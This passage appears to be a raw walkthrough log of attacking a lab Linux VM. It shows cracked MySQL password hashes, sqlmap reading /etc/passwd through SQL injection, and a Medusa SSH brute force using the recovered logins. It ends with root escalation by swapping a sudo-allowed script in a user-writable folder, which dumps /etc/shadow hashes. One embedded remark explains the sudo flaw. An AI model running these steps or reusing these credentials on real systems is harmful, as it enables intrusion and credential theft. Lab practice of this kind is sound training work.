| bphillips  | *D6B63C1953E7F096DB307F8AC48C4AD703E57001 (sunshine) |
| bwatkins   | *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E (superman) |
| cchisholm  | *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 (1234567)  |
| ccoffee    | *2CE4701D02A76C12CD513109CA16967A68B4C23A (princess) |
| dcooper    | *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 (consumer) |
| dgilfillan | *6691484EA6B50DDDE1926A220DA01FA9E575C18A (abc123)   |
| dgrant     | *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 (cheese)   |
| djohnson   | *FD571203974BA9AFE270FE62151AE967ECA5E0AA (111111)   |
| dstevens   | *B021918A5DCA54916CF724573179571DFC37AC88 (jennifer) |
| dtraylor   | *24B8599BAF46DD4B4D8DB50A3B10136457492622 (starwars) |
| dwestling  | *446525BB82B5E22BD9E525261D37C494F623C52B (blahblah) |
| hlovell    | *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 (welcome)  |
| jalcantar  | *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC (pokemon)  |
| jalvarez   | *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC (666666)   |
| jayala     | *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 (michael)  |
| jbresnahan | *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 (Password) |
| jdavenport | *61305383748FBEAB119F9A8BC35EBBADB4889A9D (babyl0n)  |
| jduff      | *46CFC7938B60837F46B610A2D10C248874555C14 (trustno1) |
| jfranklin  | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) |
| kclemons   | *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 (killer)   |
| krenfro    | *D183105443FBDE597607B8BC5475A9E1B7847F3E (gizmodo)  |
| ktso       | *81101DED975D54BD76A3C8EAD293597AE9BB143F (computer) |
| kwebber    | *79BF466BCC601BD91A0897BB162421F9BA8C29CA (lifehack) |
| lmartinez  | *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 (michelle) |
| lmorales   | *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 (master)   |
| mbryan     | *626AC8265C7D53693CB7478376CE1B4825DFF286 (pepper)   |
| mholland   | *51AA306E66303073DBA15D2750E23C90C7A7F947 (baseball) |
| mnader     | *94F3DC3F398B76269CAAD51627279D4233A6C89A (soccer)   |
| mrodriguez | *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC (jordan)   |
| myajima    | *00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345)    |
| qpowers    | *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 (12345678) |
| rdominguez | *3EEB06BE54EABF909DC8F6107110777F1DE43186 (gawker)   |
| rjacobson  | *797420C584EBF42750EB523104268BA0FD87FBC8 (internet) |
| rpatel     | *B12289EEF8752AD620294A64A37CD586223AB454 (0)        |
| sgains     | *F491287896471CB21030790BF46865C4A39DE651 (batman)   |
| sjohnson   | *FCAAF3F0BD94C027B2769A95903C355CE6294660 (football) |
| strammel   | *F8E113FD51D520075836A4B815568BA2B96F7C30 (dragon)   |
| swarren    | *7B2F14D9BB629E334CD49A1028BD85750F7D3530 (shadow)   |
| tdeleon    | *AA1420F182E88B9E5F874F6FBE7459291E8F4601 (qwerty)   |
| tgoodchap  | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein)  |
| webapp     | *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F            |
+------------+------------------------------------------------------+

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --file-read=/etc/passwd

root@kali:~# cat /usr/share/sqlmap/output/192.168.1.120/files/_etc_passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
qpowers:x:1000:100:Quinton Powers:/home/qpowers:
mbryan:x:1001:100:Michael Bryan:/home/mbryan:
dgrant:x:1002:100:Daniel Grant:/home/dgrant:
dgilfillan:x:1003:100:Darcy Gilfillan:/home/dgilfillan:
jbresnahan:x:1004:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1005:100:Adam Adams:/home/aadams:
aweiland:x:1006:100:Adam Weiland:/home/aweiland:
cchisholm:x:1007:100:Cindy Chisholm:/home/cchisholm:
jfranklin:x:1008:100:Johnny Franklin:/home/jfranklin:
hlovell:x:1009:100:Henrietta Lovell:/home/hlovell:
bphillips:x:1010:100:Brad Phillips:/home/bphillips:
myajima:x:1011:100:Moto Yajima:/home/myajima:
jalcantar:x:1012:100:Jesse Alcantar:/home/jalcantar:
jayala:x:1013:100:John Ayala:/home/jayala:
aard:x:1014:100:Aaron Ard:/home/aard:
aharp:x:1015:100:Annie Harp:/home/aharp:
lmorales:x:1016:100:Lindsey Morales:/home/lmorales:
kclemons:x:1017:100:Kathryn Clemons:/home/kclemons:
tgoodchap:x:1018:100:Taj Goodchap:/home/tgoodchap:
tdeleon:x:1019:100:Terrence Deleon:/home/tdeleon:
krenfro:x:1020:100:Kimberly Renfro:/home/krenfro:
bbanter:x:1021:100:Bob Banter:/home/bbanter:
aspears:x:1022:100:Adam Spears:/home/aspears:
djohnson:x:1023:100:Daniel Johnson:/home/djohnson:
aheflin:x:1024:100:Anna Heflin:/home/aheflin:
jdavenport:x:1025:100:James Davenport:/home/jdavenport:
sgains:x:1026:100:Susan Gains:/home/sgains:
swarren:x:1027:100:Samuel Warren:/home/swarren:
rdominguez:x:1028:100:Rafael Dominguez:/home/rdominguez:
ktso:x:1029:100:Kristen Tso:/home/ktso:
amaynard:x:1030:100:Arthur Maynard:/home/amaynard:
lmartinez:x:1031:100:Luis Martinez:/home/lmartinez:
dwestling:x:1032:100:David Westling:/home/dwestling:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
jalvarez:x:1034:100:Joy Alvarez:/home/jalvarez:
mrodriguez:x:1035:100:Manuel Rodriguez:/home/mrodriguez:
rjacobson:x:1036:100:Randy Jacobson:/home/rjacobson:
dcooper:x:1037:100:Donald Cooper:/home/dcooper:
mholland:x:1038:100:Marian Holland:/home/mholland:
aallen:x:1039:100:Aaron Allen:/home/aallen:
ccoffee:x:1040:100:Chad Coffee:/home/ccoffee:
sjohnson:x:1041:100:Steven Johnson:/home/sjohnson:
bwatkins:x:1042:100:Brandon Watkins:/home/bwatkins:
kwebber:x:1043:100:Kathleen Webber:/home/kwebber:
rpatel:x:1044:100:Randall Patel:/home/rpatel:
jduff:x:1045:100:Jerry Duff:/home/jduff:
mnader:x:1046:100:Muhammad Nader:/home/mnader:
strammel:x:1047:100:Stephanie Trammel:/home/strammel:
dstevens:x:1048:100:Donald Stevens:/home/dstevens:

root@kali:~# pico  user_pass-txt
:aadams:whatever
:aallen:nintendo
:aard:kotaku
:aharp:passw0rd
:aheflin:654321
:amaynard:123456
:aspears:monkey
:aweiland:123123
:bbanter:iloveyou
:bphillips:sunshine
:bwatkins:superman
:cchisholm:1234567
:ccoffee:princess
:dcooper:consumer
:dgilfillan:abc123
:dgrant:cheese
:djohnson:111111
:dstevens:jennifer
:dtraylor:starwars
:dwestling:blahblah
:hlovell:welcome
:jalcantar:pokemon
:jalvarez:666666
:jayala:michael
:jbresnahan:Password
:jdavenport:babyl0n
:jduff:trustno1
:jfranklin:password
:kclemons:killer
:krenfro:gizmodo
:ktso:computer
:kwebber:lifehack
:lmartinez:michelle
:lmorales:master
:mbryan:pepper
:mholland:baseball
:mnader:soccer
:mrodriguez:jordan
:myajima:12345
:qpowers:12345678
:rdominguez:gawker
:rjacobson:internet
:rpatel:0
:sgains:batman
:sjohnson:football
:strammel:dragon
:swarren:shadow
:tdeleon:qwerty
:tgoodchap:letmein

root@kali:~# medusa -h 192.168.1.120 -C user_pass-txt -M ssh -v 6
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: [combo]
GENERAL: Total Passwords: [combo]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aadams (1 of 49, 0 complete) Password: whatever (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aadams Password: whatever [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aallen (2 of 49, 1 complete) Password: nintendo (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aallen Password: nintendo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aard (3 of 49, 2 complete) Password: kotaku (1 of 1

complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aard Password: kotaku [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aharp (4 of 49, 3 complete) Password: passw0rd (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aharp Password: passw0rd [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aheflin (5 of 49, 4 complete) Password: 654321 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aheflin Password: 654321 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: amaynard (6 of 49, 5 complete) Password: 123456 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: amaynard Password: 123456 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aspears (7 of 49, 6 complete) Password: monkey (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aspears Password: monkey [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aweiland (8 of 49, 7 complete) Password: 123123 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aweiland Password: 123123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bbanter (9 of 49, 8 complete) Password: iloveyou (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bbanter Password: iloveyou [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bphillips (10 of 49, 9 complete) Password: sunshine

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bphillips Password: sunshine [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bwatkins (11 of 49, 10 complete) Password: superman

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bwatkins Password: superman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: cchisholm (12 of 49, 11 complete) Password: 1234567

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: cchisholm Password: 1234567 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ccoffee (13 of 49, 12 complete) Password: princess (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ccoffee Password: princess [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dcooper (14 of 49, 13 complete) Password: consumer (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dcooper Password: consumer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgilfillan (15 of 49, 14 complete) Password: abc123

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgilfillan Password: abc123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgrant (16 of 49, 15 complete) Password: cheese (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgrant Password: cheese [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: djohnson (17 of 49, 16 complete) Password: 111111 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: djohnson Password: 111111 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dstevens (18 of 49, 17 complete) Password: jennifer

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dstevens Password: jennifer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dtraylor (19 of 49, 18 complete) Password: starwars

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dtraylor Password: starwars [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dwestling (20 of 49, 19 complete) Password: blahblah

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dwestling Password: blahblah [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: hlovell (21 of 49, 20 complete) Password: welcome (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: hlovell Password: welcome [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalcantar (22 of 49, 21 complete) Password: pokemon

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalcantar Password: pokemon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalvarez (23 of 49, 22 complete) Password: 666666 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalvarez Password: 666666 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jayala (24 of 49, 23 complete) Password: michael (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jayala Password: michael [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jbresnahan (25 of 49, 24 complete) Password: Password

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jbresnahan Password: Password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jdavenport (26 of 49, 25 complete) Password: babyl0n

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jdavenport Password: babyl0n [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jduff (27 of 49, 26 complete) Password: trustno1 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jduff Password: trustno1 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jfranklin (28 of 49, 27 complete) Password: password

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jfranklin Password: password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kclemons (29 of 49, 28 complete) Password: killer (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kclemons Password: killer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: krenfro (30 of 49, 29 complete) Password: gizmodo (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: krenfro Password: gizmodo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ktso (31 of 49, 30 complete) Password: computer (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ktso Password: computer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kwebber (32 of 49, 31 complete) Password: lifehack (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kwebber Password: lifehack [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmartinez (33 of 49, 32 complete) Password: michelle

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmartinez Password: michelle [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmorales (34 of 49, 33 complete) Password: master (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmorales Password: master [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mbryan (35 of 49, 34 complete) Password: pepper (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mbryan Password: pepper [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mholland (36 of 49, 35 complete) Password: baseball

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mholland Password: baseball [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mnader (37 of 49, 36 complete) Password: soccer (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mnader Password: soccer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mrodriguez (38 of 49, 37 complete) Password: jordan

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mrodriguez Password: jordan [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: myajima (39 of 49, 38 complete) Password: 12345 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: myajima Password: 12345 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: qpowers (40 of 49, 39 complete) Password: 12345678 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: qpowers Password: 12345678 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rdominguez (41 of 49, 40 complete) Password: gawker

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rdominguez Password: gawker [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rjacobson (42 of 49, 41 complete) Password: internet

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rjacobson Password: internet [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rpatel (43 of 49, 42 complete) Password: 0 (1 of 1

complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rpatel Password: 0 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sgains (44 of 49, 43 complete) Password: batman (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sgains Password: batman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sjohnson (45 of 49, 44 complete) Password: football

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sjohnson Password: football [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: strammel (46 of 49, 45 complete) Password: dragon (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: strammel Password: dragon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: swarren (47 of 49, 46 complete) Password: shadow (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: swarren Password: shadow [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tdeleon (48 of 49, 47 complete) Password: qwerty (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tdeleon Password: qwerty [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tgoodchap (49 of 49, 48 complete) Password: letmein

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tgoodchap Password: letmein [SUCCESS]
GENERAL: Medusa has finished.

root@kali:~# ssh aadams@192.168.1.120
aadams@192.168.1.120's password:
Linux 2.6.27.27.
aadams@slax:~$
aadams@slax:~$ uname -a
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel

GNU/Linux
aadams@slax:~$ id
uid=1005(aadams) gid=100(users) groups=100(users)
aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user aadams may not run sudo on slax.
aadams@slax:~$

aadams@slax:~$ cat /etc/group
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root
video:x:18:root
cdrom:x:19:root
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
tape:x:26:root
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root
power:x:84:
pop:x:90:pop
scanner:x:93:
nobody:x:98:nobody
nogroup:x:99:
users:x:100:ccoffee
console:x:101:
admin:x:102:ccoffee

root@kali:~# ssh ccoffee@192.168.1.120
ccoffee@192.168.1.120's password:
Linux 2.6.27.27.
ccoffee@slax:~$

ccoffee@slax:~$ ls -al
total 12
drwx------  3 ccoffee users  120 Jan 13 10:20 ./
dr-xr-xr-x 53 root    root  1040 Jan 13 10:20 ../
-rwx------  1 ccoffee users 3729 Jan 13 10:20 .screenrc*
-rwx------  1 ccoffee users  779 Jan 13 10:20 .xsession*
-rwx------  1 ccoffee users   57 Jan 13 10:20 DONOTFORGET*
drwx------  2 ccoffee users   60 Jan 13 10:20 scripts/

ccoffee@slax:~$ ls -al scripts/
total 4
drwx------ 2 ccoffee users  60 Jan 13 10:20 ./
drwx------ 3 ccoffee users 120 Jan 13 10:20 ../
-rws--x--x 1 root    admin 110 Jan 13 10:20 getlogs.sh*

ccoffee@slax:~$ cat scripts/getlogs.sh
cat: scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo cat scripts/getlogs.sh

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user ccoffee is not allowed to execute '/usr/bin/cat scripts/getlogs.sh' as root on slax.
ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

(Note: this rule is only as strong as the path it names. The script is root-owned, but it sits in a directory owned and writable by ccoffee — `drwx------ ccoffee users scripts/` above — so the user can rename it and put any file of the same name in its place, and sudo will run that as root. A sudo target should live in a root-owned directory that the invoking user cannot write to.)
ccoffee@slax:~$ /home/ccoffee/scripts/getlogs.sh
/bin/bash: /home/ccoffee/scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo /home/ccoffee/scripts/getlogs.sh
wrong!

ccoffee@slax:~$ cd scripts
ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ vi getlogs.sh

#!/bin/bash
whoami
id
cat /etc/shadow

ccoffee@slax:~/scripts$ chmod 744 getlogs.sh

ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18

(video),19(cdrom),26(tape),83(plugdev)
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
qpowers:$1$eob/a4xo$fPoSwbgY22gWL8qyDU/.I.:16083:0:99999:7:::
mbryan:$1$tmf/f4xo$awoQgL2oPSZMX2lM12Uln1:16083:0:99999:7:::
dgrant:$1$OCh/k4xo$JDbEKsV06nre8zZPrRUvo/:16083:0:99999:7:::
dgilfillan:$1$8hi/p4xo$bWC1IcRe1crQa3s3miuL20:16083:0:99999:7:::
jbresnahan:$1$2Xk/u4xo$mjNw/vkqgdGQTIeYGK8nZ.:16083:0:99999:7:::
aadams:$1$Ttl/z4xo$UZgXCB9PGAEWTrzVJVp3K/:16083:0:99999:7:::
aweiland:$1$sQn/25xo$9y6kbW.j6RQnVz2HMP2141:16083:0:99999:7:::
cchisholm:$1$5to/75xo$6YN0xmN17AsQPldEBdPMC.:16083:0:99999:7:::
jfranklin:$1$DIq/C5xo$WmJvdtiujSkcO1/f2hr8s/:16083:0:99999:7:::
hlovell:$1$Rkr/H5xo$zu11N6JklFJOUxyb1tXTA0:16083:0:99999:7:::
bphillips:$1$eAt/M5xo$iTE1y4NzYBURlA/uLHkdb1:16083:0:99999:7:::
myajima:$1$LXu/R5xo$jLAlFMb.ocYtzQT3O02Mi.:16083:0:99999:7:::
jalcantar:$1$.Aw/W5xo$kvbWzSN38YbHd.fmsPKPh1:16083:0:99999:7:::
jayala:$1$ecx/b5xo$.n631jVFY7Brc2/mmtTJy0:16083:0:99999:7:::
aard:$1$N8z/g5xo$nvfHME6ROtq92qj9RLPFc0:16083:0:99999:7:::
aharp:$1$gd.0l5xo$1rN6r2UE6ssSQI091mcCa1:16083:0:99999:7:::
lmorales:$1$k/00q5xo$S0R/p4g1IsMwpK8Oh.J34.:16083:0:99999:7:::
kclemons:$1$xc10v5xo$CkntJIYKf2uD0wkiJ2HC00:16083:0:99999:7:::
tgoodchap:$1$y/30.6xo$PocUVCFGi9zAM3osucjfl1:16083:0:99999:7:::
tdeleon:$1$Yf4036xo$D/.NeIj324zQsz/UYQsPd0:16083:0:99999:7:::
krenfro:$1$rC6086xo$lZeDnadKgbe26e4C7Yh641:16083:0:99999:7:::
bbanter:$1$yb70D6xo$iZxi1cgaS/uLhmqhEv23Y0:16083:0:99999:7:::
aspears:$1$q790I6xo$hkQF4V5lQGAnzQwlr/Lvk0:16083:0:99999:7:::
djohnson:$1$cSA0N6xo$W62.B.xUGGpa/m.HpXD5w0:16083:0:99999:7:::
aheflin:$1$R4C0S6xo$qt/DDWtf7yneePutW7TW7.:16083:0:99999:7:::
jdavenport:$1$egt0a8xo$Lws.tBjdDpD.znXdUmj8H1:16083:0:99999:7:::
sgains:$1$tyE0c6xo$Q52MI4/PcHRpgUPaoy8UH.:16083:0:99999:7:::
swarren:$1$uTG0h6xo$EhiWJ6pmGy7QjrPg6cPcn.:16083:0:99999:7:::
rdominguez:$1$btH0m6xo$sPSjaDORJ7pbgflVMitKW.:16083:0:99999:7:::
ktso:$1$fQJ0r6xo$gpc5PjEw/l4VMBI.VhXnP/:16083:0:99999:7:::
amaynard:$1$NqK0w6xo$jXNsulUt9dqAZ4QRbc9oC1:16083:0:99999:7:::
lmartinez:$1$nNM0/7xo$7vOUEgfCSw0hGuGuprMRO1:16083:0:99999:7:::
dwestling:$1$coN047xo$8OuVbRrIUfs3EEPnq4bkI0:16083:0:99999:7:::
dtraylor:$1$SHP097xo$FSYeULOeFe2GuqoRTN/6r1:16083:0:99999:7:::
